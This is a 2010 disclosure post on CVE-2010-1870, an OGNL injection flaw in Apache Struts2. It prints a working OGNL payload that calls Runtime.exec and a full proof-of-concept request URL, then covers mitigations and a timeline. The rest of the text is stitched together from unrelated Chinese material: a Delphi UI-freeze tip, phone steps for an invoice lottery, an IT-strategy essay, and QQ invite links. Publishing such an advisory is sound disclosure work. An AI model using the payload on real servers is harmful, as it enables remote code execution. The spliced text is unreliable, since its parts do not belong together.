Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I’ve reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.

Introduction
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:

user.address.city=Bishkek&user['favoriteDrink']=kumys

into

action.getUser().getAddress().setCity(“Bishkek”)
action.getUser().setFavoriteDrink(“kumys”)

This is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.
NOTE: If you are using XWork’s ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).

In addition to property getting/setting, OGNL supports many more features:

* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more…

Since HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:

* OgnlContext’s property ‘xwork.MethodAccessor.denyMethodExecution’ (set to true by default)
* SecurityMemberAccess private field called ‘allowStaticMethodAccess’ (set to false by default)

OGNL Context variables
To make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:

* #application
* #session
* #request
* #parameters
* #attr

These variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork’s ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java’s unicode String representation: \u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further.

CVE-2010-1870
Earlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:

* #context – OgnlContext, the one guarding method execution based on ‘xwork.MethodAccessor.denyMethodExecution’ property value.
* #_memberAccess – SecurityMemberAccess, whose ‘allowStaticAccess’ field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation

You can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:

#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean(“false”)
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec(‘mkdir /tmp/PWNED’)

Actual proof of concept had to use OGNL’s expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):

http://mydomain/MyStruts.action?(‘\u0023_memberAccess[\'allowStaticMethodAccess\']‘)(meh)=true&(aaa)((‘\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo’)(\u0023foo\u003dnew%20java.lang.Boolean(“false”)))&(asdf)((‘\u0023rt.exit(1)’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Fixing CVE-2010-1870
Struts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.

In cases where upgrade isn’t possible you can use ParameterInterceptor’s “excludeParams” parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.’”[]) alternatively you can blacklist \()@ which are the characters required to exploit this bug.

Timeline
May 31st – email to security@struts.apache.org with vulnerability report.
June 4th – no response received, contacted developers again.
June 5th – had to find an XWork developer on IRC to look at this.
June 16th – Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix.
June 20th – 1-line fix commited
June 29th – Struts 2.2.0 release voting process started and is still going…

 .*\\u0023.*
/example/HelloWorld.jsp

解决方法有两个：

1. 把对IdHttp的处理，放入线程内。搞个线程也很简单，就是一旦数据交互起来，麻烦一些。

2. 好久没用delphi了，不想写太复杂的代码了，这个简单的应用里，只要界面不僵死就可以了。所以不想用线程。第二个方法就是，往界面里放入一个TIdAntiFreeze控件，(真怀念delphi的方便)。不要高兴的太早，可能界面还是动不了的。因为默认情况下idAntiFreeze的OnlyWhenIdle属性是true，改为false,才会真正的antiFreeze。

下面把按键流程给大家讲讲，让大家省点话费：

1、拨通057112366
2、按1键
3、按7键进入发票兑奖
4、接下来按照语音提示输入：1数字键盘输入，8位发票号码#，10位数字密码#，确认输入发票号码，查询发票信息，之后就是充值选项，本号码充值，还是其他号码充值选项，本号充值，还确认本号号码，充值成功提醒查收信息这样就完了。
关键是前面部分，废话不是一般的多啊，打了好多次才知道7才是发票兑奖！进入7后，也需要花几分钟才能完成兑奖。。。

    　有些企业为了IT部门工作规划，请咨询公司做IT战略规划，然后拿来做极少的修改就作为IT工作规划的汇报；或者是以以前的工作规划为主体进行IT战略规划的设计。要注意企业IT战略规划是其战略的展开，是指导IT工作规划的思想工具，IT战略规划与IT工作规划存在十大明显区别。

    　区别一：IT战略规划的目的是通过协调生存与发展的关系，为长远发展创造机会，促进实力与活力的统一；IT工作规划目的通过投资与协作，以指标为中心，增长生存基础实力。

    　许多人说咨询公司的IT战略规划没有指标、无法执行。其实IT工作规划才更关注执行，有其可以依据的指标。

    　在很多成功案例中我们就可以看到，在IT规划中结合企业信息化建设的长远发展，会对企业信息化的现状、必须的建设与发展蓝图做重点分析与标识，同时会关注IT队伍有哪些发展机会，哪些可以合作、外包都经过了细致的讨论。

     　而在IT工作规划中则以指标为中心，对战略规划中的很多问题进行落实，如JAVA开发能力应提高到什么地步，有多少人员；与哪个部门进行什么样程度的合作，必须建设的系统的资金与人员投入等等指标。

   　 区别二：IT战略规划要利用许多外部、未来和定性的信息开展研究；IT工作规划必须掌握当前、清晰准确、定量的信息进行设计。

    　在做IT规划时利用顾问的外脑，是要让他们多提供未来和定性的信息，因为这是我们所需要的。如电子商务以虚拟企业为目标，向着B2B集成发展，现在的企业多已实现网上的信息发布，正在建设和完善网上交易。也就是T型结构信息中的上横，而不是下竖，对这些努力展开。而不是在电子商务某个企业用了什么服务器、多少台、多少人等。

    　 需要提醒的是，在IT工作规划时则是关心那一竖，一定不能跑的太远，我们要用定量的数字，把我们有限的时间、资金和人员，同定量的工作对应在一起。

   　 区别三：IT战略规划是要保证企业的信息化以不变应万变；IT工作规划是要使企业的信息化以变应变。

  　  企业信息化在瞬息万变的今天，也一定要保持一个相对的静态，来实现它的战略，因为战略是需要一系列连贯的战术来实现的，千万不可朝令夕改。INTEL、MS等公司在确定他们的规划后，都会用数年的时间进行推进，如INTEL的ROSETTANET计划，一定就是六年。

    　中国有句话叫：长远规划，小步快跑。之所以小步就是为了调整步伐，来适应一些小的变化。我们在接触企业中发现，大家对这个“变化”真是又爱又恨。因为可以变，IT部门有时会利用其技术优势随心所欲；而有时候，业务部门利用需求第一，将IT部门搞的团团乱转。

   　 在这里到是建议大家应该好好习抗战时我党的战略和战术，帮助极大，一个持久战的战略坚持了八年，这就是战略的不变，游击战现在很多国家还在研究，这就是变化。

     区别四：IT战略规划针对战略环境变化重在建设；IT工作规划针对环境变化重在协作、调整。

    　许多重大系统的建设无疑都是在IT战略规划中提出的，针对企业战略环境的变化，我们一定会有新的模式与流程的创建与调整，IT战略规划一定会针对这种变化提出应对性的意见，并进行有针对性与创新性的建设。

  　  而在IT工作规划中一定会针对新系统建设需求，对原有系统进行调整，并加强资源与人力的协作，使建设可能并顺利进行。同时优化旧有系统，提升系统健康性与生命周期，加大企业资产利用率，间接为企业创造利益。

   　 区别五：IT战略规划成效的关注在成功与风险中进行统一；IT工作规划的目的则关注于特定项目中的成功。

   　 IT战略规划这就像一个地区的救火队的战略规划，不仅仅要关注这一地区的灭火，也要关注这一地区火灾的风险防范，因为降低这一地区的整体火灾损失，才是成功，而不只是成功的灭火率。

　　而IT工作规划则必须关注特定项目的执行，特别是保障某些核心项目的重点执行，从时间计划、资源、质量等方面，在一个年度IT工作规划中都有可能进行体现。

    　区别六：IT战略规划是思想指导工具；IT工作规划是事务操作的依据。

   　 前面提到过，许多公司说咨询公司的IT战略规划没有指标、无法执行。其实IT工作规划才更关注执行，有其可以依据的指标。在IT战略规划中计划还只是一个ROADMAP，以线条的长短、并行来体现，所以说IT战略规划是一个思想指导工具，有更多的定性语言。

    　而IT工作规划则对人员的培训、能力提升，项目的进度、资源，资金的分配等许多问题进行定量的描述，比战略规划要细，要更定量，是事务操作的依据。ROADMAP已向PLANNING细化，成为有起始、有月、周单位的标识，这是项目进行WBS的开始。

　    区别七：IT战略规划通过战略成本分析进行监控；IT工作规划实行建设成本和运营成本控制。

   　 IT战略规划中通过TCO、ROI、ROA等方法进行战略成本分析，以在公司收益所占比率，进行地区与行业中的横向对比，并且通过对整体与重点投入进行监控。

  　  而在IT工作规划中，资金已经被拆解到对应的建设与运营上。资金根据不同的项目需求进行拆解，而财务部门也会根据信息化管理部门对项目的审核，来进行成本核算与控制。

　　我们发现这现在是许多公司信息化工作中的一块短板，可是现在的企业决策者在财务方面都有很大的提升，那么信息化如果连成本都老控制不好，如何让决策者们支持信息化建设。

　　区别八：IT战略规划强调战略合作要依据某种共同目的；IT工作规划强调合作的新增收益。

　   IT战略规划的合作现在很多企业都已经认识了，一把手坐阵，各决策者支持，但是合作是要有共同目的为基础的。如提升企业与各生产商的快速协同能力，这样的问题对于业务与信息化部门是共同目的，一定需要在合作中解决，缺少谁也不可能实现。

　　而IT工作规划强调合作的新增收益，如INTEL通过运用信息化手段将北美各厂商的协作时间提升到3天之内，使库存成本、运输成本等都大幅降低，这在以前，如果没有信息化手段是不可能实现的，这是强调与业务合作的基础上，信息化给合作带来的不可替代的收益。许多企业在这方面总是没有指标，也区分不出哪些是业务，哪些是IT的提升，这给信息化的深入带来困难。

    　区别九：IT战略规划主要为企业信息发展创造新的竞争力；IT工作规划主要使企业的生存与发展发挥竞争力。

   　 IT战略规划主要为企业信息发展创造新的竞争力，如DELL在企业的信息化规划中，创造以信息化电子商务这基础的新的业务模式，提升企业新的竞争力；沃尔玛也是明确各种新竞争力，如全球货物实时追踪，以提升新的竞争力。而这些在IT工作规划中要进一步落实、实现和保障，以最大的发挥这种竞争力，如RFID技术的引进与装备等等。

    　区别十：参与人员与汇报对像的不同：IT战略规划是由决策者组织研究监控；IT工作规划是由执行者组织设计实施。

    　IT战略规划一定是有许多不同部门经理直接或间接参与的，一定是对CEO及其团队的汇报。IT战略规划使问题的解决，由原来业务部门和IT部门的一方主导解决，变成了协同解决，并在共同认可的架构与计划下进行，同时努力对前瞻与末来的东西达成共识。以结易思然的经验，可以说决策者对IT战略规划组织、研究、监控的监控是非常重要且必要的。

  　  IT工作规划是由执行者组织设计实施。但这不意味着局限在IT部门内部，执行者要尽可能多的在规划阶段就与其它部门的执行者进行协同，这样一定是事半功倍的效果。

http://t.qq.com/invite/b0f0c43f7824722d46a5

http://t.qq.com/invite/62e429a1fa48361b155d